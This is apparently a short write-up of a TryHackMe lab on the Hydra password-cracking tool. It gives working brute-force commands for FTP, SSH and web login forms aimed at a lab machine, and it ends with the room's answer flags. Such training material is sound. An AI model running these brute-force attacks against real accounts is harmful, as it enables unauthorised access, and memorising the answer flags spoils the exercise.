Hydra
1 min readMar 2, 2024
Task 1Hydra Introduction
Hydra is an online password cracking tool which uses brute force.
Task 2Using Hydra
- Use Hydra for brute force attacks on services such as FTP and SSH.
- FTP Command:
hydra -l user -P passlist.txt ftp://MACHINE_IP
- SSH Command:
hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
l
: SSH usernameP
: List of passwordst
: Number of threads- Hydra can also brute force web forms.
- Command for POST Web Form:
sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
l
: Username for web form loginP
: Password listhttp-post-form
: Form type is POST<path>
: Login page URL<login_credentials>
: Username and password for login<invalid_response>
: Part of response when login failsV
: Verbose output for each attempt- Example Command for POST Web Form:
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
Use Hydra to bruteforce molly’s web password. What is flag 1?
Ans: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly’s SSH password. What is flag 2?
Ans: THM{c8eeb0468febbadea859baeb33b2541b}